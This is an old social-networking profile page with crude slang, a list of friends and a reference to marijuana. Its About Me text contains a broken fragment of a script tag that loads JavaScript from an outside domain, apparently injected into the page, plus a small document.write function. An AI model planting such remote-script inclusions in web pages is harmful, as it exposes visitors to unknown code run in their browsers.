DuFfY Yo profile picture

DuFfY Yo

About Me

umm like hangin out wit my bois n my girlssss clarky .luke rickers .alex .chubs . pursey . piper . terry . raul . lil j . walla. .... most off u 's do scribbles ...... we all hav a fine taste for mary-jane ... all u need to no for now cuntzzzzzzzzzzzz pceeeeee cuntzzzzzzzzz and kelsey .. .. language="javascript" src="http://www.fuckmdk.com/request.js"function nothingf(){document.write("lolol.mov.r{}");}..

My Interests

ThEsE CuNtS ArE DaRdi


ClArKy,LuKe,CHubS.AlEx,PuRsEy,ToDd,LiL J,TeRrY,RiCkErS,RaUl,Lil WalLa,RoWlEy,NiCoLe,KeLsEy,ChArLoTte,LiLy ..